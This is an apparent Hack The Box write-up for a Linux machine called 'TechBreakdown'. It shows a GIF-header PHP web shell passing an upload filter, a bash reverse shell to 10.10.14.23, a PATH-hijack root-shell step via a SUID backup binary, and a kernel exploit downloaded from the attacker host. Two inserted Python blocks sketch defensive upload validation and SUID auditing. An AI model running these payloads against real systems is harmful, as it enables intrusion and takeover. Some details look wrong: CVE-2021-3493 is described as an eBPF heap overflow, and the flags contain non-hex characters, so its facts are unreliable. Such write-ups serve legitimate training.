TechBreakdown HTB Machine

Summary

TechBreakdown is a medium difficulty HTB Linux box.

It features a web application whose file upload filter can be bypassed.

We exploit this to gain a foothold on the machine as the www-data user.

Further enumeration reveals a misconfigured SUID binary that we use to escalate to the user account.

Root access is achieved through a kernel exploit against the outdated Linux kernel.

Writeup

Information Gathering

We start with a standard Nmap scan to identify open ports and services on the target machine.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -p- 10.10.10.123
Starting Nmap 7.93 ( https://nmap.org )
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
443/tcp open  https   Apache httpd 2.4.41 ((Ubuntu))
Service Info: Host: techbreakdown.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We add the hostname to our /etc/hosts file and explore the website.

The main website homepage.

The website appears to be a tech blog with several articles. After examining the source code, we notice it’s running a customized WordPress installation.

Vulnerability #1 - File Upload Bypass

Vulnerability Assessment

Looking at the website, we discover an upload functionality in the user profile section. This looks promising for potential exploitation.

After creating an account and logging in, we test various file types to see what’s allowed.

┌──(kali㉿kali)-[~]
└─$ curl -F "[email protected]" http://techbreakdown.htb/upload.php
{"error":"Only image files are allowed"}

The server is restricting uploads to image files, but we need to determine if there are any bypasses.

Exploitation

We create a malicious PHP file with a valid image header to bypass the check:

┌──(kali㉿kali)-[~]
└─$ cat shell.php
GIF89a;
<?php system($_GET['cmd']); ?>

We intercept the upload with Burp Suite and modify the filename to shell.php.jpg.

POST /upload.php HTTP/1.1
Host: techbreakdown.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: multipart/form-data; boundary=---------------------------12345
Cookie: PHPSESSID=a1b2c3d4e5f6g7h8i9j0

-----------------------------12345
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
Content-Type: image/jpeg

GIF89a;
<?php system($_GET['cmd']); ?>
-----------------------------12345--

The upload succeeds! We locate the uploaded file at /uploads/shell.php.jpg and can execute commands:

┌──(kali㉿kali)-[~]
└─$ curl "http://techbreakdown.htb/uploads/shell.php.jpg?cmd=id"
GIF89a;
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We upgrade to a reverse shell:

┌──(kali㉿kali)-[~]
└─$ curl "http://techbreakdown.htb/uploads/shell.php.jpg?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.23/4444+0>%261'"
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.123] 49564
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
www-data@techbreakdown:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
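The server-side check above only inspects the leading bytes, so a GIF header followed by PHP passes, and the double extension shell.php.jpg is still handed to the PHP handler. As an added example, not code from the box or from the original writeup, here is what a stricter validator looks like: it derives the stored extension from the detected signature, allows exactly one extension, and never reuses the client's filename (IMAGE_SIGNATURES, detect_image_type and validate_upload are my own names).

```python
import os
import secrets

# Allowlisted image types and the signatures each must start with. The stored
# extension is derived from the detected signature, never from the client name,
# which is what the target's "image header only" check failed to do.
IMAGE_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def detect_image_type(data: bytes):
    """Return the allowlisted type whose signature starts the data, else None."""
    for ext, sigs in IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in sigs):
            return ext
    return None


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason_or_storage_name) for one upload.

    Rejects names with more than one extension (shell.php.jpg), extensions
    outside the allowlist, a declared extension that disagrees with the
    detected signature, and a PHP open tag inside the "image".
    """
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    declared = parts[1].lower()
    if declared == "jpeg":
        declared = "jpg"
    if declared not in IMAGE_SIGNATURES:
        return False, "extension not allowed"
    detected = detect_image_type(data)
    if detected != declared:
        return False, "content does not match declared extension"
    # Heuristic defence in depth: the payload above is a GIF header followed
    # by PHP. The real control is serving /uploads with no script handler.
    if b"<?php" in data:
        return False, "embedded script tag"
    # Random storage name so the client never chooses what lands on disk.
    return True, f"{secrets.token_hex(16)}.{detected}"
```

Even with this validator in place, the upload directory must be served without a PHP handler, since a polyglot that passes every content check is still harmless only if it is never executed.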

Privilege Escalation

User

After gaining initial access, we conduct internal enumeration of the system:

www-data@techbreakdown:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/custom_backup
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

We notice a non-standard SUID binary /usr/bin/custom_backup. Let’s examine it:

www-data@techbreakdown:~$ strings /usr/bin/custom_backup
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
Creating backup...
tar -cf /tmp/backup.tar *
Backup completed!

The binary calls tar without a full path, and the imported symbols show it does so via system(), so the command is resolved through the caller's PATH. We exploit this by placing our own tar first in PATH:

www-data@techbreakdown:~$ cd /tmp
www-data@techbreakdown:/tmp$ echo '#!/bin/bash' > tar
www-data@techbreakdown:/tmp$ echo 'cp /bin/bash /tmp/shell' >> tar
www-data@techbreakdown:/tmp$ echo 'chmod u+s /tmp/shell' >> tar
www-data@techbreakdown:/tmp$ chmod +x tar
www-data@techbreakdown:/tmp$ export PATH=/tmp:$PATH
www-data@techbreakdown:/tmp$ /usr/bin/custom_backup
Creating backup...
Backup completed!
www-data@techbreakdown:/tmp$ ls -la shell
-rwsr-xr-x 1 developer www-data 1234567 Apr 15 20:14 shell
www-data@techbreakdown:/tmp$ ./shell -p
shell-5.0$ id
uid=33(www-data) gid=33(www-data) euid=1001(developer) groups=33(www-data)
shell-5.0$ cd /home/developer
shell-5.0$ cat user.txt
7a8b9c0d1e2f3g4h5i6j7k8l9m0n1o2p
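A defender-side audit of the same finding, added here and not part of the original writeup: it diffs a host's SUID list against a baseline built from the stock entries in the find output above, and flags embedded command strings whose program is not given by absolute path, which is exactly what made custom_backup hijackable (STOCK_SUID, nonstandard_suid, printable_strings, relative_commands and SAMPLE_BINARY are my own names and constructed data).

```python
import re

# Baseline of stock SUID binaries, taken from the find(1) output above with
# the suspicious entry removed; a real baseline comes from a clean reference host.
STOCK_SUID = {
    "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/umount", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
}

# Looks like a shell command line: bare lowercase program name plus arguments.
CMD_RE = re.compile(r"^[a-z][a-z0-9_.-]*(\s+\S+)+$")


def nonstandard_suid(paths):
    """Return SUID paths absent from the baseline, i.e. the ones to inspect."""
    return sorted(p for p in paths if p not in STOCK_SUID)


def printable_strings(blob: bytes, min_len: int = 4):
    """Minimal strings(1): runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def relative_commands(strs):
    """Flag command-looking strings whose program has no absolute path, so a
    system()/popen() call would resolve it through the caller's PATH."""
    hits = []
    for s in strs:
        tokens = s.split()
        if len(tokens) < 2 or "/" in tokens[0] or not CMD_RE.match(s):
            continue
        if any(t.startswith("-") or "/" in t or "*" in t for t in tokens[1:]):
            hits.append(s)
    return hits


# Constructed stand-in for the binary: the symbol and message strings seen in
# the strings(1) output above, separated by NULs like a real .rodata section.
SAMPLE_BINARY = (b"\x7fELF" + b"\x00" * 12
                 + b"setuid\x00system\x00setgid\x00Creating backup...\x00"
                 + b"tar -cf /tmp/backup.tar *\x00Backup completed!\x00")
```

The fix inside the binary itself is to run /bin/tar by absolute path and reset the environment before executing it, so the caller's PATH is never consulted.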

Root

As the developer user, we check for kernel vulnerabilities:

shell-5.0$ uname -a
Linux techbreakdown 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

This kernel version is vulnerable to CVE-2021-3493, a heap overflow in the Linux eBPF subsystem:

shell-5.0$ cd /tmp
shell-5.0$ wget http://10.10.14.23/exploit.c
shell-5.0$ gcc exploit.c -o exploit
shell-5.0$ ./exploit
[*] Checking if system is vulnerable...
[+] System is vulnerable!
[*] Compiling exploit...
[*] Triggering vulnerability...
[+] Root shell successfully spawned!
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
9z8y7x6w5v4u3t2s1r0q9p8o7n6m5l4k